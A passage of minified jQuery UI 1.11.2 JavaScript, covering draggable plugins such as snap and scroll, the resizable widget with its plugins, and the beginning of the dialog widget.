this.helper.width()),this.helper.css("right","auto")),"x"!==this.options.axis&&"auto"!==this.helper.css("bottom")&&(this.helper.height(this.helper.height()),this.helper.css("bottom","auto"))},_trigger:function(t,i,s){return s=s||this._uiHash(),e.ui.plugin.call(this,t,[i,s,this],!0),/^(drag|start|stop)/.test(t)&&(this.positionAbs=this._convertPositionTo("absolute"),s.offset=this.positionAbs),e.Widget.prototype._trigger.call(this,t,i,s)},plugins:{},_uiHash:function(){return{helper:this.helper,position:this.position,originalPosition:this.originalPosition,offset:this.positionAbs}}}),e.ui.plugin.add("draggable","connectToSortable",{start:function(t,i,s){var n=e.extend({},i,{item:s.element});s.sortables=[],e(s.options.connectToSortable).each(function(){var i=e(this).sortable("instance");i&&!i.options.disabled&&(s.sortables.push(i),i.refreshPositions(),i._trigger("activate",t,n))})},stop:function(t,i,s){var n=e.extend({},i,{item:s.element});s.cancelHelperRemoval=!1,e.each(s.sortables,function(){var e=this;e.isOver?(e.isOver=0,s.cancelHelperRemoval=!0,e.cancelHelperRemoval=!1,e._storedCSS={position:e.placeholder.css("position"),top:e.placeholder.css("top"),left:e.placeholder.css("left")},e._mouseStop(t),e.options.helper=e.options._helper):(e.cancelHelperRemoval=!0,e._trigger("deactivate",t,n))})},drag:function(t,i,s){e.each(s.sortables,function(){var n=!1,a=this;a.positionAbs=s.positionAbs,a.helperProportions=s.helperProportions,a.offset.click=s.offset.click,a._intersectsWith(a.containerCache)&&(n=!0,e.each(s.sortables,function(){return this.positionAbs=s.positionAbs,this.helperProportions=s.helperProportions,this.offset.click=s.offset.click,this!==a&&this._intersectsWith(this.containerCache)&&e.contains(a.element[0],this.element[0])&&(n=!1),n})),n?(a.isOver||(a.isOver=1,a.currentItem=i.helper.appendTo(a.element).data("ui-sortable-item",!0),a.options._helper=a.options.helper,a.options.helper=function(){return i.helper[0]},t.target=a.currentItem[0],a._mouseCapture(t,!0),a._mouseStart(t,!0,!0),a.offset.click.top=s.offset.click.top,a.offset.click.left=s.offset.click.left,a.offset.parent.left-=s.offset.parent.left-a.offset.parent.left,a.offset.parent.top-=s.offset.parent.top-a.offset.parent.top,s._trigger("toSortable",t),s.dropped=a.element,e.each(s.sortables,function(){this.refreshPositions()}),s.currentItem=s.element,a.fromOutside=s),a.currentItem&&(a._mouseDrag(t),i.position=a.position)):a.isOver&&(a.isOver=0,a.cancelHelperRemoval=!0,a.options._revert=a.options.revert,a.options.revert=!1,a._trigger("out",t,a._uiHash(a)),a._mouseStop(t,!0),a.options.revert=a.options._revert,a.options.helper=a.options._helper,a.placeholder&&a.placeholder.remove(),s._refreshOffsets(t),i.position=s._generatePosition(t,!0),s._trigger("fromSortable",t),s.dropped=!1,e.each(s.sortables,function(){this.refreshPositions()}))})}}),e.ui.plugin.add("draggable","cursor",{start:function(t,i,s){var n=e("body"),a=s.options;n.css("cursor")&&(a._cursor=n.css("cursor")),n.css("cursor",a.cursor)},stop:function(t,i,s){var n=s.options;n._cursor&&e("body").css("cursor",n._cursor)}}),e.ui.plugin.add("draggable","opacity",{start:function(t,i,s){var n=e(i.helper),a=s.options;n.css("opacity")&&(a._opacity=n.css("opacity")),n.css("opacity",a.opacity)},stop:function(t,i,s){var n=s.options;n._opacity&&e(i.helper).css("opacity",n._opacity)}}),e.ui.plugin.add("draggable","scroll",{start:function(e,t,i){i.scrollParentNotHidden||(i.scrollParentNotHidden=i.helper.scrollParent(!1)),i.scrollParentNotHidden[0]!==i.document[0]&&"HTML"!==i.scrollParentNotHidden[0].tagName&&(i.overflowOffset=i.scrollParentNotHidden.offset())},drag:function(t,i,s){var n=s.options,a=!1,o=s.scrollParentNotHidden[0],r=s.document[0];o!==r&&"HTML"!==o.tagName?(n.axis&&"x"===n.axis||(s.overflowOffset.top+o.offsetHeight-t.pageY<n.scrollSensitivity?o.scrollTop=a=o.scrollTop+n.scrollSpeed:t.pageY-s.overflowOffset.top<n.scrollSensitivity&&(o.scrollTop=a=o.scrollTop-n.scrollSpeed)),n.axis&&"y"===n.axis||(s.overflowOffset.left+o.offsetWidth-t.pageX<n.scrollSensitivity?o.scrollLeft=a=o.scrollLeft+n.scrollSpeed:t.pageX-s.overflowOffset.left<n.scrollSensitivity&&(o.scrollLeft=a=o.scrollLeft-n.scrollSpeed))):(n.axis&&"x"===n.axis||(t.pageY-e(r).scrollTop()<n.scrollSensitivity?a=e(r).scrollTop(e(r).scrollTop()-n.scrollSpeed):e(window).height()-(t.pageY-e(r).scrollTop())<n.scrollSensitivity&&(a=e(r).scrollTop(e(r).scrollTop()+n.scrollSpeed))),n.axis&&"y"===n.axis||(t.pageX-e(r).scrollLeft()<n.scrollSensitivity?a=e(r).scrollLeft(e(r).scrollLeft()-n.scrollSpeed):e(window).width()-(t.pageX-e(r).scrollLeft())<n.scrollSensitivity&&(a=e(r).scrollLeft(e(r).scrollLeft()+n.scrollSpeed)))),a!==!1&&e.ui.ddmanager&&!n.dropBehaviour&&e.ui.ddmanager.prepareOffsets(s,t)}}),e.ui.plugin.add("draggable","snap",{start:function(t,i,s){var n=s.options;s.snapElements=[],e(n.snap.constructor!==String?n.snap.items||":data(ui-draggable)":n.snap).each(function(){var t=e(this),i=t.offset();this!==s.element[0]&&s.snapElements.push({item:this,width:t.outerWidth(),height:t.outerHeight(),top:i.top,left:i.left})})},drag:function(t,i,s){var n,a,o,r,h,l,u,d,c,p,f=s.options,m=f.snapTolerance,g=i.offset.left,v=g+s.helperProportions.width,y=i.offset.top,b=y+s.helperProportions.height;for(c=s.snapElements.length-1;c>=0;c--)h=s.snapElements[c].left-s.margins.left,l=h+s.snapElements[c].width,u=s.snapElements[c].top-s.margins.top,d=u+s.snapElements[c].height,h-m>v||g>l+m||u-m>b||y>d+m||!e.contains(s.snapElements[c].item.ownerDocument,s.snapElements[c].item)?(s.snapElements[c].snapping&&s.options.snap.release&&s.options.snap.release.call(s.element,t,e.extend(s._uiHash(),{snapItem:s.snapElements[c].item})),s.snapElements[c].snapping=!1):("inner"!==f.snapMode&&(n=m>=Math.abs(u-b),a=m>=Math.abs(d-y),o=m>=Math.abs(h-v),r=m>=Math.abs(l-g),n&&(i.position.top=s._convertPositionTo("relative",{top:u-s.helperProportions.height,left:0}).top),a&&(i.position.top=s._convertPositionTo("relative",{top:d,left:0}).top),o&&(i.position.left=s._convertPositionTo("relative",{top:0,left:h-s.helperProportions.width}).left),r&&(i.position.left=s._convertPositionTo("relative",{top:0,left:l}).left)),p=n||a||o||r,"outer"!==f.snapMode&&(n=m>=Math.abs(u-y),a=m>=Math.abs(d-b),o=m>=Math.abs(h-g),r=m>=Math.abs(l-v),n&&(i.position.top=s._convertPositionTo("relative",{top:u,left:0}).top),a&&(i.position.top=s._convertPositionTo("relative",{top:d-s.helperProportions.height,left:0}).top),o&&(i.position.left=s._convertPositionTo("relative",{top:0,left:h}).left),r&&(i.position.left=s._convertPositionTo("relative",{top:0,left:l-s.helperProportions.width}).left)),!s.snapElements[c].snapping&&(n||a||o||r||p)&&s.options.snap.snap&&s.options.snap.snap.call(s.element,t,e.extend(s._uiHash(),{snapItem:s.snapElements[c].item})),s.snapElements[c].snapping=n||a||o||r||p)}}),e.ui.plugin.add("draggable","stack",{start:function(t,i,s){var n,a=s.options,o=e.makeArray(e(a.stack)).sort(function(t,i){return(parseInt(e(t).css("zIndex"),10)||0)-(parseInt(e(i).css("zIndex"),10)||0)});o.length&&(n=parseInt(e(o[0]).css("zIndex"),10)||0,e(o).each(function(t){e(this).css("zIndex",n+t)}),this.css("zIndex",n+o.length))}}),e.ui.plugin.add("draggable","zIndex",{start:function(t,i,s){var n=e(i.helper),a=s.options;n.css("zIndex")&&(a._zIndex=n.css("zIndex")),n.css("zIndex",a.zIndex)},stop:function(t,i,s){var n=s.options;n._zIndex&&e(i.helper).css("zIndex",n._zIndex)}}),e.ui.draggable,e.widget("ui.resizable",e.ui.mouse,{version:"1.11.2",widgetEventPrefix:"resize",options:{alsoResize:!1,animate:!1,animateDuration:"slow",animateEasing:"swing",aspectRatio:!1,autoHide:!1,containment:!1,ghost:!1,grid:!1,handles:"e,s,se",helper:!1,maxHeight:null,maxWidth:null,minHeight:10,minWidth:10,zIndex:90,resize:null,start:null,stop:null},_num:function(e){return parseInt(e,10)||0},_isNumber:function(e){return!isNaN(parseInt(e,10))},_hasScroll:function(t,i){if("hidden"===e(t).css("overflow"))return!1;var s=i&&"left"===i?"scrollLeft":"scrollTop",n=!1;return t[s]>0?!0:(t[s]=1,n=t[s]>0,t[s]=0,n)},_create:function(){var t,i,s,n,a,o=this,r=this.options;if(this.element.addClass("ui-resizable"),e.extend(this,{_aspectRatio:!!r.aspectRatio,aspectRatio:r.aspectRatio,originalElement:this.element,_proportionallyResizeElements:[],_helper:r.helper||r.ghost||r.animate?r.helper||"ui-resizable-helper":null}),this.element[0].nodeName.match(/canvas|textarea|input|select|button|img/i)&&(this.element.wrap(e("<div class='ui-wrapper' style='overflow: hidden;'></div>").css({position:this.element.css("position"),width:this.element.outerWidth(),height:this.element.outerHeight(),top:this.element.css("top"),left:this.element.css("left")})),this.element=this.element.parent().data("ui-resizable",this.element.resizable("instance")),this.elementIsWrapper=!0,this.element.css({marginLeft:this.originalElement.css("marginLeft"),marginTop:this.originalElement.css("marginTop"),marginRight:this.originalElement.css("marginRight"),marginBottom:this.originalElement.css("marginBottom")}),this.originalElement.css({marginLeft:0,marginTop:0,marginRight:0,marginBottom:0}),this.originalResizeStyle=this.originalElement.css("resize"),this.originalElement.css("resize","none"),this._proportionallyResizeElements.push(this.originalElement.css({position:"static",zoom:1,display:"block"})),this.originalElement.css({margin:this.originalElement.css("margin")}),this._proportionallyResize()),this.handles=r.handles||(e(".ui-resizable-handle",this.element).length?{n:".ui-resizable-n",e:".ui-resizable-e",s:".ui-resizable-s",w:".ui-resizable-w",se:".ui-resizable-se",sw:".ui-resizable-sw",ne:".ui-resizable-ne",nw:".ui-resizable-nw"}:"e,s,se"),this.handles.constructor===String)for("all"===this.handles&&(this.handles="n,e,s,w,se,sw,ne,nw"),t=this.handles.split(","),this.handles={},i=0;t.length>i;i++)s=e.trim(t[i]),a="ui-resizable-"+s,n=e("<div class='ui-resizable-handle "+a+"'></div>"),n.css({zIndex:r.zIndex}),"se"===s&&n.addClass("ui-icon ui-icon-gripsmall-diagonal-se"),this.handles[s]=".ui-resizable-"+s,this.element.append(n);this._renderAxis=function(t){var i,s,n,a;t=t||this.element;for(i in this.handles)this.handles[i].constructor===String&&(this.handles[i]=this.element.children(this.handles[i]).first().show()),this.elementIsWrapper&&this.originalElement[0].nodeName.match(/textarea|input|select|button/i)&&(s=e(this.handles[i],this.element),a=/sw|ne|nw|se|n|s/.test(i)?s.outerHeight():s.outerWidth(),n=["padding",/ne|nw|n/.test(i)?"Top":/se|sw|s/.test(i)?"Bottom":/^e$/.test(i)?"Right":"Left"].join(""),t.css(n,a),this._proportionallyResize()),e(this.handles[i]).length},this._renderAxis(this.element),this._handles=e(".ui-resizable-handle",this.element).disableSelection(),this._handles.mouseover(function(){o.resizing||(this.className&&(n=this.className.match(/ui-resizable-(se|sw|ne|nw|n|e|s|w)/i)),o.axis=n&&n[1]?n[1]:"se")}),r.autoHide&&(this._handles.hide(),e(this.element).addClass("ui-resizable-autohide").mouseenter(function(){r.disabled||(e(this).removeClass("ui-resizable-autohide"),o._handles.show())}).mouseleave(function(){r.disabled||o.resizing||(e(this).addClass("ui-resizable-autohide"),o._handles.hide())})),this._mouseInit()},_destroy:function(){this._mouseDestroy();var t,i=function(t){e(t).removeClass("ui-resizable ui-resizable-disabled ui-resizable-resizing").removeData("resizable").removeData("ui-resizable").unbind(".resizable").find(".ui-resizable-handle").remove()};return this.elementIsWrapper&&(i(this.element),t=this.element,this.originalElement.css({position:t.css("position"),width:t.outerWidth(),height:t.outerHeight(),top:t.css("top"),left:t.css("left")}).insertAfter(t),t.remove()),this.originalElement.css("resize",this.originalResizeStyle),i(this.originalElement),this},_mouseCapture:function(t){var i,s,n=!1;for(i in this.handles)s=e(this.handles[i])[0],(s===t.target||e.contains(s,t.target))&&(n=!0);return!this.options.disabled&&n},_mouseStart:function(t){var i,s,n,a=this.options,o=this.element;return this.resizing=!0,this._renderProxy(),i=this._num(this.helper.css("left")),s=this._num(this.helper.css("top")),a.containment&&(i+=e(a.containment).scrollLeft()||0,s+=e(a.containment).scrollTop()||0),this.offset=this.helper.offset(),this.position={left:i,top:s},this.size=this._helper?{width:this.helper.width(),height:this.helper.height()}:{width:o.width(),height:o.height()},this.originalSize=this._helper?{width:o.outerWidth(),height:o.outerHeight()}:{width:o.width(),height:o.height()},this.sizeDiff={width:o.outerWidth()-o.width(),height:o.outerHeight()-o.height()},this.originalPosition={left:i,top:s},this.originalMousePosition={left:t.pageX,top:t.pageY},this.aspectRatio="number"==typeof a.aspectRatio?a.aspectRatio:this.originalSize.width/this.originalSize.height||1,n=e(".ui-resizable-"+this.axis).css("cursor"),e("body").css("cursor","auto"===n?this.axis+"-resize":n),o.addClass("ui-resizable-resizing"),this._propagate("start",t),!0},_mouseDrag:function(t){var i,s,n=this.originalMousePosition,a=this.axis,o=t.pageX-n.left||0,r=t.pageY-n.top||0,h=this._change[a];return this._updatePrevProperties(),h?(i=h.apply(this,[t,o,r]),this._updateVirtualBoundaries(t.shiftKey),(this._aspectRatio||t.shiftKey)&&(i=this._updateRatio(i,t)),i=this._respectSize(i,t),this._updateCache(i),this._propagate("resize",t),s=this._applyChanges(),!this._helper&&this._proportionallyResizeElements.length&&this._proportionallyResize(),e.isEmptyObject(s)||(this._updatePrevProperties(),this._trigger("resize",t,this.ui()),this._applyChanges()),!1):!1},_mouseStop:function(t){this.resizing=!1;var i,s,n,a,o,r,h,l=this.options,u=this;return this._helper&&(i=this._proportionallyResizeElements,s=i.length&&/textarea/i.test(i[0].nodeName),n=s&&this._hasScroll(i[0],"left")?0:u.sizeDiff.height,a=s?0:u.sizeDiff.width,o={width:u.helper.width()-a,height:u.helper.height()-n},r=parseInt(u.element.css("left"),10)+(u.position.left-u.originalPosition.left)||null,h=parseInt(u.element.css("top"),10)+(u.position.top-u.originalPosition.top)||null,l.animate||this.element.css(e.extend(o,{top:h,left:r})),u.helper.height(u.size.height),u.helper.width(u.size.width),this._helper&&!l.animate&&this._proportionallyResize()),e("body").css("cursor","auto"),this.element.removeClass("ui-resizable-resizing"),this._propagate("stop",t),this._helper&&this.helper.remove(),!1},_updatePrevProperties:function(){this.prevPosition={top:this.position.top,left:this.position.left},this.prevSize={width:this.size.width,height:this.size.height}},_applyChanges:function(){var e={};return this.position.top!==this.prevPosition.top&&(e.top=this.position.top+"px"),this.position.left!==this.prevPosition.left&&(e.left=this.position.left+"px"),this.size.width!==this.prevSize.width&&(e.width=this.size.width+"px"),this.size.height!==this.prevSize.height&&(e.height=this.size.height+"px"),this.helper.css(e),e},_updateVirtualBoundaries:function(e){var t,i,s,n,a,o=this.options;a={minWidth:this._isNumber(o.minWidth)?o.minWidth:0,maxWidth:this._isNumber(o.maxWidth)?o.maxWidth:1/0,minHeight:this._isNumber(o.minHeight)?o.minHeight:0,maxHeight:this._isNumber(o.maxHeight)?o.maxHeight:1/0},(this._aspectRatio||e)&&(t=a.minHeight*this.aspectRatio,s=a.minWidth/this.aspectRatio,i=a.maxHeight*this.aspectRatio,n=a.maxWidth/this.aspectRatio,t>a.minWidth&&(a.minWidth=t),s>a.minHeight&&(a.minHeight=s),a.maxWidth>i&&(a.maxWidth=i),a.maxHeight>n&&(a.maxHeight=n)),this._vBoundaries=a},_updateCache:function(e){this.offset=this.helper.offset(),this._isNumber(e.left)&&(this.position.left=e.left),this._isNumber(e.top)&&(this.position.top=e.top),this._isNumber(e.height)&&(this.size.height=e.height),this._isNumber(e.width)&&(this.size.width=e.width)},_updateRatio:function(e){var t=this.position,i=this.size,s=this.axis;return this._isNumber(e.height)?e.width=e.height*this.aspectRatio:this._isNumber(e.width)&&(e.height=e.width/this.aspectRatio),"sw"===s&&(e.left=t.left+(i.width-e.width),e.top=null),"nw"===s&&(e.top=t.top+(i.height-e.height),e.left=t.left+(i.width-e.width)),e},_respectSize:function(e){var t=this._vBoundaries,i=this.axis,s=this._isNumber(e.width)&&t.maxWidth&&t.maxWidth<e.width,n=this._isNumber(e.height)&&t.maxHeight&&t.maxHeight<e.height,a=this._isNumber(e.width)&&t.minWidth&&t.minWidth>e.width,o=this._isNumber(e.height)&&t.minHeight&&t.minHeight>e.height,r=this.originalPosition.left+this.originalSize.width,h=this.position.top+this.size.height,l=/sw|nw|w/.test(i),u=/nw|ne|n/.test(i);return a&&(e.width=t.minWidth),o&&(e.height=t.minHeight),s&&(e.width=t.maxWidth),n&&(e.height=t.maxHeight),a&&l&&(e.left=r-t.minWidth),s&&l&&(e.left=r-t.maxWidth),o&&u&&(e.top=h-t.minHeight),n&&u&&(e.top=h-t.maxHeight),e.width||e.height||e.left||!e.top?e.width||e.height||e.top||!e.left||(e.left=null):e.top=null,e},_getPaddingPlusBorderDimensions:function(e){for(var t=0,i=[],s=[e.css("borderTopWidth"),e.css("borderRightWidth"),e.css("borderBottomWidth"),e.css("borderLeftWidth")],n=[e.css("paddingTop"),e.css("paddingRight"),e.css("paddingBottom"),e.css("paddingLeft")];4>t;t++)i[t]=parseInt(s[t],10)||0,i[t]+=parseInt(n[t],10)||0;return{height:i[0]+i[2],width:i[1]+i[3]}},_proportionallyResize:function(){if(this._proportionallyResizeElements.length)for(var e,t=0,i=this.helper||this.element;this._proportionallyResizeElements.length>t;t++)e=this._proportionallyResizeElements[t],this.outerDimensions||(this.outerDimensions=this._getPaddingPlusBorderDimensions(e)),e.css({height:i.height()-this.outerDimensions.height||0,width:i.width()-this.outerDimensions.width||0})},_renderProxy:function(){var t=this.element,i=this.options;this.elementOffset=t.offset(),this._helper?(this.helper=this.helper||e("<div style='overflow:hidden;'></div>"),this.helper.addClass(this._helper).css({width:this.element.outerWidth()-1,height:this.element.outerHeight()-1,position:"absolute",left:this.elementOffset.left+"px",top:this.elementOffset.top+"px",zIndex:++i.zIndex}),this.helper.appendTo("body").disableSelection()):this.helper=this.element},_change:{e:function(e,t){return{width:this.originalSize.width+t}},w:function(e,t){var i=this.originalSize,s=this.originalPosition;return{left:s.left+t,width:i.width-t}},n:function(e,t,i){var s=this.originalSize,n=this.originalPosition;return{top:n.top+i,height:s.height-i}},s:function(e,t,i){return{height:this.originalSize.height+i}},se:function(t,i,s){return e.extend(this._change.s.apply(this,arguments),this._change.e.apply(this,[t,i,s]))},sw:function(t,i,s){return e.extend(this._change.s.apply(this,arguments),this._change.w.apply(this,[t,i,s]))},ne:function(t,i,s){return e.extend(this._change.n.apply(this,arguments),this._change.e.apply(this,[t,i,s]))},nw:function(t,i,s){return e.extend(this._change.n.apply(this,arguments),this._change.w.apply(this,[t,i,s]))}},_propagate:function(t,i){e.ui.plugin.call(this,t,[i,this.ui()]),"resize"!==t&&this._trigger(t,i,this.ui())},plugins:{},ui:function(){return{originalElement:this.originalElement,element:this.element,helper:this.helper,position:this.position,size:this.size,originalSize:this.originalSize,originalPosition:this.originalPosition}}}),e.ui.plugin.add("resizable","animate",{stop:function(t){var i=e(this).resizable("instance"),s=i.options,n=i._proportionallyResizeElements,a=n.length&&/textarea/i.test(n[0].nodeName),o=a&&i._hasScroll(n[0],"left")?0:i.sizeDiff.height,r=a?0:i.sizeDiff.width,h={width:i.size.width-r,height:i.size.height-o},l=parseInt(i.element.css("left"),10)+(i.position.left-i.originalPosition.left)||null,u=parseInt(i.element.css("top"),10)+(i.position.top-i.originalPosition.top)||null;i.element.animate(e.extend(h,u&&l?{top:u,left:l}:{}),{duration:s.animateDuration,easing:s.animateEasing,step:function(){var s={width:parseInt(i.element.css("width"),10),height:parseInt(i.element.css("height"),10),top:parseInt(i.element.css("top"),10),left:parseInt(i.element.css("left"),10)};n&&n.length&&e(n[0]).css({width:s.width,height:s.height}),i._updateCache(s),i._propagate("resize",t)}})}}),e.ui.plugin.add("resizable","containment",{start:function(){var t,i,s,n,a,o,r,h=e(this).resizable("instance"),l=h.options,u=h.element,d=l.containment,c=d instanceof e?d.get(0):/parent/.test(d)?u.parent().get(0):d;c&&(h.containerElement=e(c),/document/.test(d)||d===document?(h.containerOffset={left:0,top:0},h.containerPosition={left:0,top:0},h.parentData={element:e(document),left:0,top:0,width:e(document).width(),height:e(document).height()||document.body.parentNode.scrollHeight}):(t=e(c),i=[],e(["Top","Right","Left","Bottom"]).each(function(e,s){i[e]=h._num(t.css("padding"+s))}),h.containerOffset=t.offset(),h.containerPosition=t.position(),h.containerSize={height:t.innerHeight()-i[3],width:t.innerWidth()-i[1]},s=h.containerOffset,n=h.containerSize.height,a=h.containerSize.width,o=h._hasScroll(c,"left")?c.scrollWidth:a,r=h._hasScroll(c)?c.scrollHeight:n,h.parentData={element:c,left:s.left,top:s.top,width:o,height:r}))},resize:function(t){var i,s,n,a,o=e(this).resizable("instance"),r=o.options,h=o.containerOffset,l=o.position,u=o._aspectRatio||t.shiftKey,d={top:0,left:0},c=o.containerElement,p=!0;c[0]!==document&&/static/.test(c.css("position"))&&(d=h),l.left<(o._helper?h.left:0)&&(o.size.width=o.size.width+(o._helper?o.position.left-h.left:o.position.left-d.left),u&&(o.size.height=o.size.width/o.aspectRatio,p=!1),o.position.left=r.helper?h.left:0),l.top<(o._helper?h.top:0)&&(o.size.height=o.size.height+(o._helper?o.position.top-h.top:o.position.top),u&&(o.size.width=o.size.height*o.aspectRatio,p=!1),o.position.top=o._helper?h.top:0),n=o.containerElement.get(0)===o.element.parent().get(0),a=/relative|absolute/.test(o.containerElement.css("position")),n&&a?(o.offset.left=o.parentData.left+o.position.left,o.offset.top=o.parentData.top+o.position.top):(o.offset.left=o.element.offset().left,o.offset.top=o.element.offset().top),i=Math.abs(o.sizeDiff.width+(o._helper?o.offset.left-d.left:o.offset.left-h.left)),s=Math.abs(o.sizeDiff.height+(o._helper?o.offset.top-d.top:o.offset.top-h.top)),i+o.size.width>=o.parentData.width&&(o.size.width=o.parentData.width-i,u&&(o.size.height=o.size.width/o.aspectRatio,p=!1)),s+o.size.height>=o.parentData.height&&(o.size.height=o.parentData.height-s,u&&(o.size.width=o.size.height*o.aspectRatio,p=!1)),p||(o.position.left=o.prevPosition.left,o.position.top=o.prevPosition.top,o.size.width=o.prevSize.width,o.size.height=o.prevSize.height)},stop:function(){var t=e(this).resizable("instance"),i=t.options,s=t.containerOffset,n=t.containerPosition,a=t.containerElement,o=e(t.helper),r=o.offset(),h=o.outerWidth()-t.sizeDiff.width,l=o.outerHeight()-t.sizeDiff.height;t._helper&&!i.animate&&/relative/.test(a.css("position"))&&e(this).css({left:r.left-n.left-s.left,width:h,height:l}),t._helper&&!i.animate&&/static/.test(a.css("position"))&&e(this).css({left:r.left-n.left-s.left,width:h,height:l})}}),e.ui.plugin.add("resizable","alsoResize",{start:function(){var t=e(this).resizable("instance"),i=t.options,s=function(t){e(t).each(function(){var t=e(this);t.data("ui-resizable-alsoresize",{width:parseInt(t.width(),10),height:parseInt(t.height(),10),left:parseInt(t.css("left"),10),top:parseInt(t.css("top"),10)})})};"object"!=typeof i.alsoResize||i.alsoResize.parentNode?s(i.alsoResize):i.alsoResize.length?(i.alsoResize=i.alsoResize[0],s(i.alsoResize)):e.each(i.alsoResize,function(e){s(e)})},resize:function(t,i){var s=e(this).resizable("instance"),n=s.options,a=s.originalSize,o=s.originalPosition,r={height:s.size.height-a.height||0,width:s.size.width-a.width||0,top:s.position.top-o.top||0,left:s.position.left-o.left||0},h=function(t,s){e(t).each(function(){var t=e(this),n=e(this).data("ui-resizable-alsoresize"),a={},o=s&&s.length?s:t.parents(i.originalElement[0]).length?["width","height"]:["width","height","top","left"];e.each(o,function(e,t){var i=(n[t]||0)+(r[t]||0);i&&i>=0&&(a[t]=i||null)}),t.css(a)})};"object"!=typeof n.alsoResize||n.alsoResize.nodeType?h(n.alsoResize):e.each(n.alsoResize,function(e,t){h(e,t)})},stop:function(){e(this).removeData("resizable-alsoresize")}}),e.ui.plugin.add("resizable","ghost",{start:function(){var t=e(this).resizable("instance"),i=t.options,s=t.size;t.ghost=t.originalElement.clone(),t.ghost.css({opacity:.25,display:"block",position:"relative",height:s.height,width:s.width,margin:0,left:0,top:0}).addClass("ui-resizable-ghost").addClass("string"==typeof i.ghost?i.ghost:""),t.ghost.appendTo(t.helper)},resize:function(){var t=e(this).resizable("instance");t.ghost&&t.ghost.css({position:"relative",height:t.size.height,width:t.size.width})},stop:function(){var t=e(this).resizable("instance");t.ghost&&t.helper&&t.helper.get(0).removeChild(t.ghost.get(0))}}),e.ui.plugin.add("resizable","grid",{resize:function(){var t,i=e(this).resizable("instance"),s=i.options,n=i.size,a=i.originalSize,o=i.originalPosition,r=i.axis,h="number"==typeof s.grid?[s.grid,s.grid]:s.grid,l=h[0]||1,u=h[1]||1,d=Math.round((n.width-a.width)/l)*l,c=Math.round((n.height-a.height)/u)*u,p=a.width+d,f=a.height+c,m=s.maxWidth&&p>s.maxWidth,g=s.maxHeight&&f>s.maxHeight,v=s.minWidth&&s.minWidth>p,y=s.minHeight&&s.minHeight>f;s.grid=h,v&&(p+=l),y&&(f+=u),m&&(p-=l),g&&(f-=u),/^(se|s|e)$/.test(r)?(i.size.width=p,i.size.height=f):/^(ne)$/.test(r)?(i.size.width=p,i.size.height=f,i.position.top=o.top-c):/^(sw)$/.test(r)?(i.size.width=p,i.size.height=f,i.position.left=o.left-d):((0>=f-u||0>=p-l)&&(t=i._getPaddingPlusBorderDimensions(this)),f-u>0?(i.size.height=f,i.position.top=o.top-c):(f=u-t.height,i.size.height=f,i.position.top=o.top+a.height-f),p-l>0?(i.size.width=p,i.position.left=o.left-d):(p=u-t.height,i.size.width=p,i.position.left=o.left+a.width-p))}}),e.ui.resizable,e.widget("ui.dialog",{version:"1.11.2",options:{appendTo:"body",autoOpen:!0,buttons:[],closeOnEscape:!0,closeText:"Close",dialogClass:"",draggable:!0,hide:null,height:"auto",maxHeight:null,maxWidth:null,minHeight:150,minWidth:150,modal:!1,position:{my:"center",at:"center",of:window,collision:"fit",using:function(t){var i=e(this).css(t).offset().top;0>i&&e(this).css("top",t.top-i)}},resizable:!0,show:null,title:null,width:300,beforeClose:null,close:null,drag:null,dragStart:null,dragStop:null,focus:null,open:null,resize:null,resizeStart:null,resizeStop:null},sizeRelatedOptions:{buttons:!0,height:!0,maxHeight:!0,maxWidth:!0,minHeight:!0,minWidth:!0,width:!0},resizableRelatedOptions:{maxHeight:!0,maxWidth:!0,minHeight:!0,minWidth:!0},_create:function(){this.originalCss={display:this.element[0].style.display,width:this.element[0].style.width,minHeight:this.element[0].style.minHeight,maxHeight:this.element[0].style.maxHeight,height:this.element[0].style.height},this.originalPosition={parent:this.element.parent(),index:this.element.parent().children().index(this.element)},this.originalTitle=this.element.attr("title"),this.options.title=this.options.title||this.originalTitle,this._createWrapper(),this.element.show().removeAttr("title").addClass("ui-dialog-content ui-widget-content").appendTo(this.uiDialog),this._createTitlebar(),this._createButtonPane(),this.options.draggable&&e.fn.draggable&&this._makeDraggable(),this.options.resizable&&e.fn.resizable&&this._makeResizable(),this._isOpen=!1,this._trackFocus()},_init:function(){this.options.autoOpen&&this.open()},_appendTo:function(){var t=this.options.appendTo;return t&&(t.jquery||t.nodeType)?e(t):this.document.find(t||"body").eq(0)},_destroy:function(){var e,t=this.originalPosition;this._destroyOverlay(),this.element.removeUniqueId().removeClass("ui-dialog-content ui-widget-content").css(this.originalCss).detach(),this.uiDialog.stop(!0,!0).remove(),this.originalTitle&&this.element.attr("title",this.originalTitle),e=t.parent.children().eq(t.index),e.length&&e[0]!==this.element[0]?e.before(this.element):t.parent.append(this.element)},widget:function(){return this.uiDialog},disable:e.noop,enable:e.noop,close:function(t){var i,s=this;if(this._isOpen&&this._trigger("beforeClose",t)!==!1){if(this._isOpen=!1,this._focusedElement=null,this._destroyOverlay(),this._untrackInstance(),!this.opener.filter(":focusable").focus().length)try{i=this.document[0].activeElement,i&&"body"!==i.nodeName.toLowerCase()&&e(i).blur()}catch(n){}this._hide(this.uiDialog,this.options.hide,function(){s._trigger("close",t)})}},isOpen:function(){return this._isOpen},moveToTop:function(){this._moveToTop()},_moveToTop:function(t,i){var s=!1,n=this.uiDialog.siblings(".ui-front:visible").map(function(){return+e(this).css("z-index")}).get(),a=Math.max.apply(null,n);return a>=+this.uiDialog.css("z-index")&&(this.uiDialog.css("z-index",a+1),s=!0),s&&!i&&this._trigger("focus",t),s},open:function(){var t=this;return this._isOpen?(this._moveToTop()&&this._focusTabbable(),void 0):(this._isOpen=!0,this.opener=e(this.document[0].activeElement),this._size(),this._position(),this._createOverlay(),this._moveToTop(null,!0),this.overlay&&this.overlay.css("z-index",this.uiDialog.css("z-index")-1),this._show(this.uiDialog,this.options.show,function(){t._focusTabbable(),t._trigger("focus")}),this._makeFocusTarget(),this._trigger("open"),void 0)},_focusTabbable:function(){var e=this._focusedElement;e||(e=this.element.find("[autofocus]")),e.length||(e=this.element.find(":tabbable")),e.length||(e=this.uiDialogButtonPane.find(":tabbable")),e.length||(e=this.uiDialogTitlebarClose.filter(":tabbable")),e.length||(e=this.uiDialog),e.eq(0).focus()},_keepFocus:function(t){function i(){var t=this.document[0].activeElement,i=this.uiDialog[0]===t||e.contains(this.uiDialog[0],t);i||this._focusTabbable()}t.preventDefault(),i.call(this),this._delay(i)},_createWrapper:function(){this.uiDialog=e("<div>").addClass("ui-dialog ui-widget ui-widget-content ui-corner-all ui-front 